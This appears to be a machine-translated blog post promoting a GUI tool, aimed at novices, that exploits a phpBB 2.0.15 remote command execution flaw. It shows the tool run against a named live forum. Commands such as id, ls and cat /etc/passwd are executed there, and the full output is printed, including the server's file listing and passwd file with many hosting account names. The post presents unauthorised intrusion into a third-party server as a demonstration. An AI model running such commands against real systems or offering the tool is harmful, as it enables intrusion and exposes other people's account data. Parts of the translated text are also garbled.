The annoying little semester is over, and you can see <PHPbb2.0.15 remote command execution vulnerability test rewrite note>, now you are free, I also wrote a GUI version of the exploitation program for this vulnerability, which is suitable for cainiao. the program basically implements logging.
Test:
Forum Url: http://www.tuoitho.net/diendan/
Topic ID: 15218 Command: id
Data Received ed: uid = 99 (nobody) gid = 99 (nobody) groups = 99 (nobody)
Of course, we can use another command, such as entering ls to return:
_ Makepagelink. php
_New_register.txt
_News.txt
Admin
Bank_index.php
Cache
Chat_popup.js
Common. php
Config. php
Db
Ecards
Extension. inc
Faq. php
Flashgame
Forum. php
Gallery
Groupcp. php
Images
Includes
Index. php
Language
Login. php
Memberlist. php
Modcp. php
Photo
Posting. php
Privmsg. php
Profile. php
Realmusic. php
Search. php
Streammedia. php
Templates
Tt_images
Tt_temp
Ttd_news.php
Vietuni8.js
Viewforum. php
Viewonline. php
Viewtopic. php
Ysi.htm
Ysi. php
Enter cat/etc/passwd and return:
Root: x: 0: 0: root:/bin/bash
Bin: x: 1: 1: bin:/sbin/nologin
Daemon: x: 2: 2: daemon:/sbin/nologin
Adm: x: 3: 4: adm:/var/adm:/sbin/nologin
Lp: x: 4: 7: lp:/var/spool/lpd:/sbin/nologin
Sync: x: 5: 0: sync:/sbin:/bin/sync
Shutdown: x: 6: 0: shutdown:/sbin/shutdown
Halt: x: 7: 0: halt:/sbin/halt
Mail: x: 8: 12: mail:/var/spool/mail:/sbin/nologin
News: x: 9: 13: news:/etc/news:
Uucp: x: 10: 14: uucp:/var/spool/uucp:/sbin/nologin
Operator: x: 11: 0: operator:/root:/sbin/nologin
Games: x: 12: 100: games:/usr/games:/sbin/nologin
Gopher: x: 13: 30: gopher:/var/gopher:/sbin/nologin
Ftp: x: 14: 50: FTP User:/var/ftp:/sbin/nologin
Nobody: x: 99: 99: Nobody: // sbin/nologin
Vcsa: x: 69: 69: virtual console memory owner:/dev:/sbin/nologin
Rpm: x: 37: 37:/var/lib/rpm:/sbin/nologin
Nscd: x: 28: 28: NSCD Daemon: // sbin/nologin
Ident: x: 100: 101:/home/ident:/sbin/nologin
Netdump: x: 34: 34: Network Crash Dump user:/var/crash:/bin/bash
Sshd: x: 74: 74: Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
Rpc: x: 32: 32: Portmapper RPC user: // sbin/nologin
Pcap: x: 77: 77:/var/arpwatch:/sbin/nologin
Xfs: x: 43: 43: X Font Server:/etc/X11/fs:/sbin/nologin
Wnn: x: 49: 49: Wnn Input Server:/var/lib/wnn:/sbin/nologin
Named: x: 25: 25: Named:/var/named:/sbin/nologin
Mysql: x: 101: 102: MySQL server:/var/lib/mysql:/bin/bash
Mailnull: x: 47: 47: Exim:/var/spool/mqueue:/bin/false
Cpanel: x: 32001: 502:/usr/local/cpanel:/bin/bash
Mailman: x: 32002: 503:/usr/local/cpanel/3 rdparty/mailman:/bin/bash
Ltsv-1990: x: 32003: 32003:/home/ltsv-1990:/bin/bash
Ttnet: x: 32004: 504:/home/ttnet:/bin/bash
Ttmail: x: 32005: 505:/home/ttmail:/usr/local/cpanel/bin/noshell
Doicongl: x: 32006: 506:/home/doicongl:/usr/local/cpanel/bin/noshell
Realmsof: x: 32007: 507:/home/realmsof:/usr/local/cpanel/bin/noshell
Trpanoco: x: 32009: 509:/home/trpanoco:/usr/local/cpanel/bin/noshell
Qua: x: 32008: 508:/home/qua:/usr/local/cpanel/bin/noshell
Key: x: 32010: 510:/home/key:/usr/local/cpanel/bin/noshell
Cuop: x: 32011: 511:/home/cuop:/usr/local/cpanel/bin/noshell
Bluewebp: x: 32012: 512:/home/bluewebp:/usr/local/cpanel/bin/noshell
Shuffled: x: 32013: 513:/home/shugoten:/usr/local/cpanel/bin/noshell
Afghansa: x: 32014: 514:/home/afghansa:/usr/local/cpanel/bin/noshell
Polishtr: x: 32015: 515:/home/polishtr:/usr/local/cpanel/bin/noshell
Gioitrec: x: 32016: 516:/home/gioitrec:/usr/local/cpanel/bin/noshell
Colorado: x: 32017: 517:/home/colorado:/usr/local/cpanel/bin/noshell
Wannabel: x: 32018: 518:/home/wannabel:/usr/local/cpanel/bin/noshell
Cactuslo: x: 32019: 519:/home/cactuslo:/usr/local/cpanel/bin/noshell
Aznphoto: x: 32020: 520:/home/aznphoto:/bin/bash
Journeyo: x: 32021: 521:/home/journeyo:/usr/local/cpanel/bin/noshell
Chiroupa: x: 32022: 522:/home/chiroupa:/usr/local/cpanel/bin/noshell